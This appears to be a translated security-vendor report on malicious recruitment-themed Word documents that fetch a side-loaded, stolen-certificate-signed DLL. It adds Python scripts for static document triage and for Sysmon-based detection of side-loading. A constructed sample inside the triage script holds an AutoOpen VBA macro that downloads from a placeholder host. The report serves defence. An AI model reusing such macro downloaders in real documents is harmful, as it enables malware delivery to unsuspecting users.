On May 8, the AhnLab ASEC analysis team published a post on the distribution of malware signed with a code-signing certificate stolen from a Korean gaming company. Since then, ASEC has confirmed distribution of the same type of malware with some modifications. The files are being distributed under a variety of filenames, which are described below.
As in the case introduced in the previous post, this malware uses a recruitment document of a cryptocurrency company as its lure.
Furthermore, the attacker put "adjusted details" in the title to prompt users who are curious about the changes to open the document file. Judging by this, it is highly likely that the attacker is distributing the file under different titles tailored to specific target organizations.
- Titles of distributed documents
– **news reorganization details.docx
– PAYS reorganization.docx
– **bit new employee application template.docx
The execution flow of this document is the same as in the previous case: the original document connects to the network to fetch an additional document, and the final malicious DLL is executed by way of that downloaded document.
- Download URL for the changed connecting document
Whereas the previous attack carried the malware inside the linked document itself and created the file from it, this attack downloads the file from an external server. In the document's VBA code (shown in the original post), the download link ends with a randomly generated id value, so the exact URL requested varies from one execution to the next; URL-based indicators should therefore be matched on the host and path rather than on the full string.
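As an added example (not code from the ASEC post), the following Python script performs the static triage a responder would do on such a lure document: it checks for an embedded VBA project, lists package relationships that point to external targets (one common way a document pulls a second document from the network; the post does not state which mechanism this sample uses, so this check is an assumption), and extracts embedded URLs, flagging those that carry an id parameter like the download link described above. The sample document is constructed in memory with the placeholder host example.invalid, and its vbaProject.bin is left uncompressed for readability; real VBA streams are MS-OVBA compressed, so run oletools' olevba on actual samples rather than relying on a raw string scan.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
# Schema/namespace URLs appear in every OOXML package and are not indicators.
BENIGN_URL_PREFIXES = ("http://schemas.", "https://schemas.", "http://www.w3.org/")
URL_RE = re.compile(rb"https?://[^\s\"'<>]+")


def build_sample_docx(macro: bool = True, external_template: bool = True) -> bytes:
    """Build a minimal Word package in memory. Constructed sample, not the real lure."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
                    '<Default Extension="xml" ContentType="application/xml"/></Types>')
        zf.writestr("word/document.xml",
                    '<?xml version="1.0"?><w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
                    '<w:body><w:p><w:r><w:t>adjusted details</w:t></w:r></w:p></w:body></w:document>')
        doc_rels = ['<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/>']
        if macro:
            doc_rels.append('<Relationship Id="rId2" Type="http://schemas.microsoft.com/office/2006/relationships/vbaProject" Target="vbaProject.bin"/>')
            # Real vbaProject.bin streams are MS-OVBA compressed; this constructed stream keeps the
            # strings plain so the scan below can see the download URL with its random id suffix.
            zf.writestr("word/vbaProject.bin",
                        b"\x00\x00Sub AutoOpen()\r\n"
                        b'  Set h = CreateObject("MSXML2.XMLHTTP")\r\n'
                        b'  h.Open "GET", "http://example.invalid/doc.php?id=" & Int(Rnd * 100000), False\r\n'
                        b"End Sub\x00")
        zf.writestr("word/_rels/document.xml.rels",
                    f'<?xml version="1.0"?><Relationships xmlns="{REL_NS}">' + "".join(doc_rels) + "</Relationships>")
        if external_template:
            # Hypothetical remote-template relationship: the package fetches another document from the network.
            zf.writestr("word/_rels/settings.xml.rels",
                        f'<?xml version="1.0"?><Relationships xmlns="{REL_NS}">'
                        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" '
                        'Target="http://example.invalid/tpl/5813.dotm" TargetMode="External"/></Relationships>')
    return buf.getvalue()


def triage_docx(data: bytes) -> dict:
    """Static triage: macro presence, external relationship targets, and embedded URLs."""
    findings = {"has_macros": False, "external_targets": [], "urls": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            content = zf.read(name)
            if name.endswith("vbaProject.bin"):
                findings["has_macros"] = True
            if name.endswith(".rels"):
                for rel in ET.fromstring(content).iter(f"{{{REL_NS}}}Relationship"):
                    if rel.get("TargetMode") == "External":
                        kind = rel.get("Type", "").rsplit("/", 1)[-1]
                        findings["external_targets"].append((kind, rel.get("Target")))
            for raw in URL_RE.findall(content):
                url = raw.decode("ascii", "replace")
                if not url.startswith(BENIGN_URL_PREFIXES) and url not in findings["urls"]:
                    findings["urls"].append(url)
    return findings


def verdict(findings: dict) -> list:
    """Human-readable reasons to treat the document as suspicious (empty list means nothing found)."""
    reasons = []
    if findings["has_macros"]:
        reasons.append("contains VBA project")
    for kind, target in findings["external_targets"]:
        reasons.append(f"external {kind} relationship -> {target}")
    for url in findings["urls"]:
        # A download URL whose id is filled in at runtime is the pattern described in the post.
        if "?id=" in url:
            reasons.append(f"download URL with id parameter -> {url}")
    return reasons


if __name__ == "__main__":
    for reason in verdict(triage_docx(build_sample_docx())):
        print(reason)
```

Feed triage_docx the bytes of a suspect .docx or .docm; any non-empty verdict is grounds to detonate the file in a sandbox rather than open it, and the extracted host and path can be searched in proxy logs even though the id suffix differs per execution.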
The DLL that is finally executed is created as msedgeupdate.dll, as before, and is loaded by the legitimate MicrosoftEdgeUpdate.exe (DLL side-loading), under which it runs. The C&C address the DLL connects to has changed as shown below, and the DLL sends user information to it. It is speculated that the file will receive additional data from the server in the future.
- Changed C&C address
Moreover, the DLL is still signed with the stolen certificate of a major Korean company.
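The side-loading step in a detection-oriented form, as an added example that is not code from the ASEC post: the check below runs over Sysmon-style ImageLoad (Event ID 7) records and flags MicrosoftEdgeUpdate.exe loading msedgeupdate.dll from outside its expected directory, unsigned, with a non-Valid signature status, or with a signer other than Microsoft. The expected install directory and the signer names are assumptions for this example, and the records are constructed, with the signer name "Example Games Co., Ltd." standing in for the stolen certificate. The signer check is the important one: a stolen certificate produces a Signed=true, status Valid result, so "is it signed" is not a useful question and "who signed it" is.

```python
from dataclasses import dataclass
from pathlib import PureWindowsPath
from typing import Dict, List, Tuple


@dataclass
class ImageLoad:
    """Subset of a Sysmon Event ID 7 (ImageLoad) record."""
    image: str             # process that loaded the DLL
    image_loaded: str      # full path of the DLL
    signed: bool
    signature: str         # signer subject name as reported
    signature_status: str  # e.g. "Valid", "Revoked", "Unavailable"


# Host executable -> (DLL it legitimately loads, directory it is expected to run from).
# The expected directory is an assumption for this example; adjust it to your estate.
SIDELOAD_PAIRS: Dict[str, Tuple[str, str]] = {
    "microsoftedgeupdate.exe": ("msedgeupdate.dll", r"c:\program files (x86)\microsoft\edgeupdate"),
}
# Signers the Edge Update binaries are expected to carry (assumption for this example).
EXPECTED_SIGNERS = {"microsoft corporation", "microsoft windows"}


def check_sideload(ev: ImageLoad) -> List[str]:
    """Return the reasons an image-load event looks like side-loading; empty list if it looks normal."""
    host = PureWindowsPath(ev.image)
    dll = PureWindowsPath(ev.image_loaded)
    pair = SIDELOAD_PAIRS.get(host.name.lower())
    if pair is None or dll.name.lower() != pair[0]:
        return []
    expected_dll, expected_dir = pair
    reasons = []
    if not str(host.parent).lower().startswith(expected_dir):
        reasons.append(f"host executable running outside {expected_dir}: {ev.image}")
    if not str(dll.parent).lower().startswith(expected_dir):
        reasons.append(f"{expected_dll} loaded from unexpected directory: {ev.image_loaded}")
    if not ev.signed:
        reasons.append("DLL is unsigned")
    else:
        # A valid signature from the wrong company is exactly what a stolen certificate looks like.
        if ev.signature.lower() not in EXPECTED_SIGNERS:
            reasons.append(f"DLL signed by unexpected signer: {ev.signature}")
        # Stolen certificates are often revoked once the theft is known; catch that too.
        if ev.signature_status.lower() != "valid":
            reasons.append(f"signature status {ev.signature_status}")
    return reasons


def scan(events: List[ImageLoad]) -> List[Tuple[str, List[str]]]:
    """Run check_sideload over a batch of events and keep only the hits."""
    hits = []
    for ev in events:
        reasons = check_sideload(ev)
        if reasons:
            hits.append((ev.image_loaded, reasons))
    return hits


# Constructed records, not telemetry from the real incident. Paths and version number are illustrative.
SAMPLE_EVENTS = [
    # Normal updater run from its install directory with a Microsoft-signed DLL.
    ImageLoad(r"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe",
              r"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.135.29\msedgeupdate.dll",
              True, "Microsoft Corporation", "Valid"),
    # Copied updater in a temp directory loading a DLL signed with someone else's certificate.
    ImageLoad(r"C:\Users\user\AppData\Local\Temp\MicrosoftEdgeUpdate.exe",
              r"C:\Users\user\AppData\Local\Temp\msedgeupdate.dll",
              True, "Example Games Co., Ltd.", "Valid"),
    # Unrelated load that the rule must ignore.
    ImageLoad(r"C:\Windows\System32\notepad.exe", r"C:\Windows\System32\kernel32.dll",
              True, "Microsoft Windows", "Valid"),
    # DLL swapped in place under the real install directory, caught by signer and revoked status.
    ImageLoad(r"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe",
              r"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.135.29\msedgeupdate.dll",
              True, "Example Games Co., Ltd.", "Revoked"),
]


if __name__ == "__main__":
    for loaded, reasons in scan(SAMPLE_EVENTS):
        print(loaded)
        for r in reasons:
            print("  -", r)
```

The same rule translates directly into a SIEM query on Sysmon Event ID 7 (Image, ImageLoaded, Signed, Signature, SignatureStatus); the fourth sample shows why the path check alone is insufficient when the attacker replaces the DLL where the legitimate one lives.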
Given that malware of this type is continually targeting the cryptocurrency industry, media outlets, and IT companies, users must refrain from opening document files from unknown sources and remain vigilant to avoid damage.
AhnLab's anti-malware product V3 detects the malicious document files and the DLL file under the aliases below.
- Downloader/XML.Generic (2020.05.14.04)
- Dropper/DOC.Generic (2020.05.14.04)
- Trojan/Win32.Agent.C4085977 (2020.05.04.05)